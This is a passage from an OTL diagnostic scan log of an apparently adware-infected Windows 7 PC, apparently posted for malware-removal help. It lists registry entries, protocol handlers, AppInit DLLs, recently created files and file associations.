O10 - Protocol_Catalog9\Catalog_Entries\000000000003 - C:\Windows\SysWow64\plsapp.dll (Sendori)
O10 - Protocol_Catalog9\Catalog_Entries\000000000004 - C:\Windows\SysWow64\plsapp.dll (Sendori)
O10 - Protocol_Catalog9\Catalog_Entries\000000000015 - C:\Windows\SysWow64\plsapp.dll (Sendori)
O13[b]64bit:
- gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.2.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C5C5E002-1F32-4BE6-B678-97D7840F66E6}: DhcpNameServer = 192.168.2.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C6B0776A-746E-42ED-9893-5B8E2C1F22A1}: NameServer = 8.8.8.8
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{CB083945-1B1E-457A-A9E5-8ADF752F9E62}: DhcpNameServer = 192.168.2.1
O18:[b]64bit:
- Protocol\Handler\linkscanner {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgppa.dll File not found
O18:[b]64bit:
- Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18:[b]64bit:
- Protocol\Handler\viprotocol - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\linkscanner - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O18 - Protocol\Handler\viprotocol {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.0\ViProtocol.dll (AVG Secure Search)
O20:[b]64bit:
- AppInit_DLLs: (C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll) - C:\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC64Loader.dll (Client Connect LTD)
O20 - AppInit_DLLs: (C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC32Loader.dll) - C:\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC32Loader.dll (Client Connect LTD)
O20:[b]64bit:
- HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit:
- HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O21:[b]64bit:
- SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2014/06/06 17:46:39 | 000,002,970 | ---- | M] () - C:\autoupdate.log -- [ NTFS ]
O33 - MountPoints2\{1db441a4-bb9f-11e1-8d90-806e6f6e6963}\Shell - "" = AutoRun
O33 - MountPoints2\{1db441a4-bb9f-11e1-8d90-806e6f6e6963}\Shell\AutoRun\command - "" = D:\Autorun.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O34 - HKLM BootExecute: (/sync /restart)
O34 - HKLM BootExecute: (/sync /restart)
O34 - HKLM BootExecute: (/sync /restart)
O35:[b]64bit:
- HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:
- HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:
- HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:
- HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/06/07 14:53:21 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\COCHRAN\Desktop\OTL.exe
[2014/06/06 16:50:14 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Roaming\ParetoLogic
[2014/06/06 16:50:14 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Roaming\DriverCure
[2014/06/06 16:49:42 | 000,000,000 | ---D | C] -- C:\ProgramData\ParetoLogic
[2014/06/06 16:35:17 | 000,000,000 | ---D | C] -- C:\ProgramData\Kaspersky Lab
[2014/06/05 11:36:16 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\Desktop\CoolRom Installers
[2014/06/04 22:08:55 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Local\SearchProtect
[2014/06/04 22:08:50 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SearchProtect
[2014/06/04 22:06:58 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerISO
[2014/06/04 21:32:32 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\Desktop\New folder (2)
[2014/06/04 02:27:07 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Roaming\WinRAR
[2014/06/04 02:26:22 | 000,000,000 | ---D | C] -- C:\Program Files\WinRAR
[2014/06/04 01:52:51 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\Desktop\New folder
[2014/06/03 14:20:06 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Roaming\MotioninJoy
[2014/06/03 14:20:00 | 000,328,712 | ---- | C] (Logitech Inc.) -- C:\Windows\SysNative\MijFrc.dll
[2014/06/03 14:20:00 | 000,121,416 | ---- | C] (MotioninJoy) -- C:\Windows\SysNative\drivers\MijXfilt.sys
[2014/06/03 14:20:00 | 000,074,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\xusb21.sys
[2014/06/03 14:20:00 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MotioninJoy
[2014/06/03 14:19:59 | 000,000,000 | ---D | C] -- C:\Program Files\MotioninJoy
[2014/06/02 00:26:50 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Roaming\PowerISO
[2014/06/02 00:18:00 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\Documents\PCSX2
[2014/06/02 00:16:58 | 000,000,000 | ---D | C] -- C:\ProgramData\Package Cache
[2014/06/02 00:15:46 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PCSX2
[2014/06/02 00:15:42 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\PCSX2 1.2.1
[2014/06/02 00:01:51 | 000,439,296 | ---- | C] (Sendori) -- C:\Windows\SysNative\plsapp64.dll
[2014/06/02 00:01:50 | 000,354,592 | ---- | C] (Sendori) -- C:\Windows\SysWow64\plsapp.dll
[2014/06/02 00:01:46 | 000,000,000 | ---D | C] -- C:\ProgramData\PureLeads
[2014/06/02 00:01:43 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\PureLeads
[2014/06/02 00:00:27 | 000,129,944 | ---- | C] (Power Software Ltd) -- C:\Windows\SysNative\drivers\scdemu.sys
[2014/06/02 00:00:19 | 000,000,000 | ---D | C] -- C:\Program Files\PowerISO
[2014/06/01 23:59:31 | 002,819,320 | ---- | C] (Power Software Ltd) -- C:\Users\COCHRAN\Desktop\PowerISO5-x64.exe
[2014/06/01 23:57:53 | 000,000,000 | ---D | C] -- C:\ProgramData\TopApp soft
[2014/06/01 15:48:11 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Roaming\uTorrent
[2014/06/01 15:46:30 | 001,671,504 | ---- | C] (BitTorrent Inc.) -- C:\Users\COCHRAN\Desktop\uTorrent.exe
[2014/05/17 15:09:03 | 000,000,000 | RHSD | C] -- C:\Users\COCHRAN\2v57a52ep7
[2014/05/12 18:34:22 | 000,000,000 | RHSD | C] -- C:\Users\COCHRAN\kr2759867s7
[2014/05/11 23:01:14 | 000,000,000 | ---D | C] -- C:\Users\COCHRAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\rgcaudio software
[2014/05/11 23:01:14 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\rgcaudio software
[2014/05/11 22:59:45 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\rgcaudio software
[2014/05/11 22:58:56 | 000,000,000 | RHSD | C] -- C:\Users\COCHRAN\d5g5rz7tw8n
[2014/05/11 16:39:13 | 000,000,000 | ---D | C] -- C:\Windows\SysWow64\Adobe
[2014/05/11 16:36:01 | 012,838,568 | ---- | C] (Adobe Systems Inc.) -- C:\Users\COCHRAN\Desktop\Shockwave_Installer_Full.exe
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/06/07 14:53:27 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\COCHRAN\Desktop\OTL.exe
[2014/06/07 14:26:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/06/07 14:07:00 | 000,000,900 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/06/06 18:07:20 | 000,000,896 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/06/06 17:46:15 | 000,000,811 | -HS- | M] () -- C:\Users\COCHRAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.lnk
[2014/06/06 17:39:44 | 000,022,080 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/06/06 17:39:44 | 000,022,080 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/06/06 17:35:28 | 000,778,834 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/06/06 17:35:28 | 000,660,068 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/06/06 17:35:28 | 000,120,996 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/06/06 17:31:19 | 000,000,446 | ---- | M] () -- C:\Windows\tasks\ParetoLogic Update Version3_triggeronce.job
[2014/06/06 17:31:16 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/06/06 17:31:15 | 2130,116,607 | -HS- | M] () -- C:\hiberfil.sys
[2014/06/06 16:32:04 | 139,348,920 | ---- | M] () -- C:\Users\COCHRAN\Desktop\setup_11.0.1.1245.x01_2014_06_06_23_24.exe
[2014/06/06 16:10:06 | 000,001,222 | ---- | M] () -- C:\Users\COCHRAN\Desktop\Continue Kingdom Hearts Installation.lnk
[2014/06/04 22:06:59 | 000,000,832 | ---- | M] () -- C:\Users\Public\Desktop\PowerISO.lnk
[2014/06/04 02:26:01 | 001,916,960 | ---- | M] () -- C:\Users\COCHRAN\Desktop\winrar-x64-51b4.exe
[2014/06/03 14:23:34 | 000,000,000 | -H-- | M] () -- C:\Windows\SysNative\drivers\Msft_Kernel_xusb21_01009.Wdf
[2014/06/03 14:23:33 | 000,000,000 | -H-- | M] () -- C:\Windows\SysNative\drivers\Msft_Kernel_MijXfilt_01009.Wdf
[2014/06/03 14:20:01 | 000,000,947 | ---- | M] () -- C:\Users\COCHRAN\Application Data\Microsoft\Internet Explorer\Quick Launch\DS3 Tool.lnk
[2014/06/03 14:20:01 | 000,000,923 | ---- | M] () -- C:\Users\Public\Desktop\DS3 Tool.lnk
[2014/06/03 14:19:12 | 004,117,346 | ---- | M] () -- C:\Users\COCHRAN\Desktop\MotioninJoy_071001_signed.zip
[2014/06/02 00:24:12 | 018,626,812 | ---- | M] () -- C:\Users\COCHRAN\Desktop\PCSX2 BIOS.zip
[2014/06/02 00:16:34 | 000,001,989 | ---- | M] () -- C:\Users\Public\Desktop\PCSX2 1.2.1 (r5875).lnk
[2014/06/02 00:15:31 | 015,127,264 | ---- | M] () -- C:\Users\COCHRAN\Desktop\pcsx2-1.2.1-r5875-setup.exe
[2014/06/01 23:59:58 | 002,819,320 | ---- | M] (Power Software Ltd) -- C:\Users\COCHRAN\Desktop\PowerISO5-x64.exe
[2014/06/01 15:48:44 | 000,000,855 | ---- | M] () -- C:\Users\COCHRAN\Desktop\µTorrent.lnk
[2014/06/01 15:48:44 | 000,000,835 | ---- | M] () -- C:\Users\COCHRAN\Application Data\Microsoft\Internet Explorer\Quick Launch\µTorrent.lnk
[2014/06/01 15:47:02 | 001,671,504 | ---- | M] (BitTorrent Inc.) -- C:\Users\COCHRAN\Desktop\uTorrent.exe
[2014/05/31 18:11:05 | 000,002,183 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/05/17 15:09:03 | 001,360,086 | ---- | M] () -- C:\Users\COCHRAN\AppData\Roaming\qirbzlaje.exe
[2014/05/14 05:27:57 | 000,692,400 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2014/05/14 05:27:57 | 000,070,832 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2014/05/12 18:34:20 | 001,569,853 | ---- | M] () -- C:\Users\COCHRAN\AppData\Roaming\saafsaf.exe
[2014/05/11 22:42:51 | 006,859,889 | ---- | M] () -- C:\Users\COCHRAN\Desktop\z3ta.exe
[2014/05/11 16:38:04 | 012,838,568 | ---- | M] (Adobe Systems Inc.) -- C:\Users\COCHRAN\Desktop\Shockwave_Installer_Full.exe
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/06/06 16:49:48 | 000,000,446 | ---- | C] () -- C:\Windows\tasks\ParetoLogic Update Version3_triggeronce.job
[2014/06/06 16:33:38 | 139,348,920 | ---- | C] () -- C:\Users\COCHRAN\Desktop\setup_11.0.1.1245.x01_2014_06_06_23_24.exe
[2014/06/05 11:36:41 | 000,001,222 | ---- | C] () -- C:\Users\COCHRAN\Desktop\Continue Kingdom Hearts Installation.lnk
[2014/06/04 02:25:51 | 001,916,960 | ---- | C] () -- C:\Users\COCHRAN\Desktop\winrar-x64-51b4.exe
[2014/06/03 14:23:34 | 000,000,000 | -H-- | C] () -- C:\Windows\SysNative\drivers\Msft_Kernel_xusb21_01009.Wdf
[2014/06/03 14:23:33 | 000,000,000 | -H-- | C] () -- C:\Windows\SysNative\drivers\Msft_Kernel_MijXfilt_01009.Wdf
[2014/06/03 14:20:01 | 000,000,947 | ---- | C] () -- C:\Users\COCHRAN\Application Data\Microsoft\Internet Explorer\Quick Launch\DS3 Tool.lnk
[2014/06/03 14:20:01 | 000,000,923 | ---- | C] () -- C:\Users\Public\Desktop\DS3 Tool.lnk
[2014/06/03 14:18:55 | 004,117,346 | ---- | C] () -- C:\Users\COCHRAN\Desktop\MotioninJoy_071001_signed.zip
[2014/06/02 00:22:13 | 018,626,812 | ---- | C] () -- C:\Users\COCHRAN\Desktop\PCSX2 BIOS.zip
[2014/06/02 00:15:47 | 000,001,989 | ---- | C] () -- C:\Users\Public\Desktop\PCSX2 1.2.1 (r5875).lnk
[2014/06/02 00:12:38 | 015,127,264 | ---- | C] () -- C:\Users\COCHRAN\Desktop\pcsx2-1.2.1-r5875-setup.exe
[2014/06/02 00:00:37 | 000,000,832 | ---- | C] () -- C:\Users\Public\Desktop\PowerISO.lnk
[2014/06/01 15:48:44 | 000,000,855 | ---- | C] () -- C:\Users\COCHRAN\Desktop\µTorrent.lnk
[2014/06/01 15:48:44 | 000,000,835 | ---- | C] () -- C:\Users\COCHRAN\Application Data\Microsoft\Internet Explorer\Quick Launch\µTorrent.lnk
[2014/05/17 15:08:06 | 001,360,086 | ---- | C] () -- C:\Users\COCHRAN\AppData\Roaming\qirbzlaje.exe
[2014/05/12 18:33:04 | 001,569,853 | ---- | C] () -- C:\Users\COCHRAN\AppData\Roaming\saafsaf.exe
[2014/05/11 22:59:29 | 000,000,811 | -HS- | C] () -- C:\Users\COCHRAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.lnk
[2014/05/11 22:41:09 | 006,859,889 | ---- | C] () -- C:\Users\COCHRAN\Desktop\z3ta.exe
[2013/07/11 03:54:25 | 000,000,218 | ---- | C] () -- C:\Users\COCHRAN\.recently-used.xbel
[2013/06/26 21:44:58 | 000,003,728 | ---- | C] () -- C:\Program Files (x86)\Mozilla Firefoxavg-secure-search.xml
[2013/01/05 23:44:58 | 000,205,151 | ---- | C] () -- C:\Windows\hpwins26.dat
[2012/10/05 15:53:22 | 000,004,608 | ---- | C] () -- C:\Users\COCHRAN\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/10/05 15:52:59 | 000,745,016 | ---- | C] () -- C:\Windows\unins000.exe
[2012/10/05 15:52:59 | 000,047,738 | ---- | C] () -- C:\Windows\unins000.dat
[2012/10/05 15:52:55 | 000,216,064 | ---- | C] ( ) -- C:\Windows\SysWow64\LAGARITH.DLL
[2012/06/25 20:02:19 | 000,772,558 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2012/06/22 19:50:39 | 000,451,072 | ---- | C] () -- C:\Windows\SysWow64\ISSRemoveSP.exe
 
========== ZeroAccess Check ==========
 
[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2013/02/27 00:52:56 | 014,172,672 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2013/02/26 23:55:05 | 012,872,704 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 22:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 147 bytes -> C:\ProgramData\TEMP:890CC2F3

< End of report >
 

and here is the Extras.Txt...

 

OTL Extras logfile created on: 6/7/2014 2:56:25 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\COCHRAN\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.10.9200.16635)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
7.98 Gb Total Physical Memory | 4.27 Gb Available Physical Memory | 53.47% Memory free
15.96 Gb Paging File | 12.00 Gb Available in Paging File | 75.23% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 931.41 Gb Total Space | 325.74 Gb Free Space | 34.97% Space Free | Partition Type: NTFS
Drive E: | 3.66 Gb Total Space | 0.00 Gb Free Space | 0.00% Space Free | Partition Type: CDFS
 
Computer Name: COCHRAN-PC | User Name: COCHRAN | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (All) ==========
 
 
========== File Associations ==========
 
[b]64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.chm[@ = chm.file] -- C:\Windows\hh.exe (Microsoft Corporation)
.cpl[@ = cplfile] -- C:\Windows\SysNative\control.exe (Microsoft Corporation)
.hlp[@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
.hta[@ = htafile] -- C:\Windows\SysWOW64\mshta.exe (Microsoft Corporation)
.html[@ = ChromeHTML] -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
.inf[@ = inffile] -- C:\Windows\SysNative\NOTEPAD.EXE (Microsoft Corporation)
.ini[@ = inifile] -- C:\Windows\SysNative\NOTEPAD.EXE (Microsoft Corporation)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
.js[@ = JSFile] -- C:\Windows\SysNative\WScript.exe (Microsoft Corporation)
.jse[@ = JSEFile] -- C:\Windows\SysNative\WScript.exe (Microsoft Corporation)
.reg[@ = regfile] -- C:\Windows\regedit.exe (Microsoft Corporation)
.txt[@ = txtfile] -- C:\Windows\SysNative\NOTEPAD.EXE (Microsoft Corporation)
.vbe[@ = VBEFile] -- C:\Windows\SysNative\WScript.exe (Microsoft Corporation)
.vbs[@ = VBSFile] -- C:\Windows\SysNative\WScript.exe (Microsoft Corporation)
.wsf[@ = WSFFile] -- C:\Windows\SysNative\WScript.exe (Microsoft Corporation)
.wsh[@ = WSHFile] -- C:\Windows\SysNative\WScript.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.bat [@ = batfile] -- "%1" %*
.chm [@ = chm.file] -- C:\Windows\hh.exe (Microsoft Corporation)
.cmd [@ = cmdfile] -- "%1" %*
.com [@ = comfile] -- "%1" %*
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.exe [@ = exefile] -- "%1" %*
.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
.hta [@ = htafile] -- C:\Windows\SysWOW64\mshta.exe (Microsoft Corporation)
.html [@ = ChromeHTML] -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
.inf [@ = inffile] -- C:\Windows\SysWow64\NOTEPAD.EXE (Microsoft Corporation)
.ini [@ = inifile] -- C:\Windows\SysWow64\NOTEPAD.EXE (Microsoft Corporation)
.url [@ = InternetShortcut] -- C:\Windows\SysWow64\rundll32.exe (Microsoft Corporation)
.js [@ = JSFile] -- C:\Windows\SysWow64\WScript.exe (Microsoft Corporation)
.jse [@ = JSEFile] -- C:\Windows\SysWow64\WScript.exe (Microsoft Corporation)
.pif [@ = piffile] -- "%1" %*
.reg [@ = regfile] -- C:\Windows\SysWow64\regedit.exe (Microsoft Corporation)
.scr [@ = scrfile] -- "%1" /S
.txt [@ = txtfile] -- C:\Windows\SysWow64\NOTEPAD.EXE (Microsoft Corporation)
.vbe [@ = VBEFile] -- C:\Windows\SysWow64\WScript.exe (Microsoft Corporation)
.vbs [@ = VBSFile] -- C:\Windows\SysWow64\WScript.exe (Microsoft Corporation)
.wsf [@ = WSFFile] -- C:\Windows\SysWow64\WScript.exe (Microsoft Corporation)
.wsh [@ = WSHFile] -- C:\Windows\SysWow64\WScript.exe (Microsoft Corporation)
 
[HKEY_USERS\S-1-5-21-1681504733-1289828258-2380439542-1000\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
 
========== Shell Spawning ==========
 
[b]64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
batfile [open] -- "%1" %*
batfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
chm.file [open] -- "%SystemRoot%\hh.exe" %1 (Microsoft Corporation)
cmdfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
cmdfile [open] -- "%1" %*
cmdfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
htafile [open] -- C:\Windows\SysWOW64\mshta.exe "%1" %* (Microsoft Corporation)
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
inffile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
inffile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
inifile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
inifile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
jsfile [edit] -- C:\Windows\System32\Notepad.exe %1 (Microsoft Corporation)
jsfile [open] -- C:\Windows\System32\WScript.exe "%1" %* (Microsoft Corporation)
jsfile [print] -- C:\Windows\System32\Notepad.exe /p %1 (Microsoft Corporation)
jsefile [edit] -- C:\Windows\System32\Notepad.exe %1 (Microsoft Corporation)
jsefile [open] -- C:\Windows\System32\WScript.exe "%1" %* (Microsoft Corporation)
jsefile [print] -- C:\Windows\System32\Notepad.exe /p %1 (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [edit] -- %SystemRoot%\system32\notepad.exe "%1" (Microsoft Corporation)
regfile [open] -- regedit.exe "%1" (Microsoft Corporation)
regfile [merge] -- Reg Error: Key error.
regfile [print] -- %SystemRoot%\system32\notepad.exe /p "%1" (Microsoft Corporation)
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
txtfile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
txtfile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
txtfile [printto] -- %SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4" (Microsoft Corporation)
vbefile [edit] -- "%SystemRoot%\System32\Notepad.exe" %1 (Microsoft Corporation)
vbefile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
vbefile [print] -- "%SystemRoot%\System32\Notepad.exe" /p %1 (Microsoft Corporation)
vbsfile [edit] -- "%SystemRoot%\System32\Notepad.exe" %1 (Microsoft Corporation)
vbsfile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
vbsfile [print] -- "%SystemRoot%\System32\Notepad.exe" /p %1 (Microsoft Corporation)
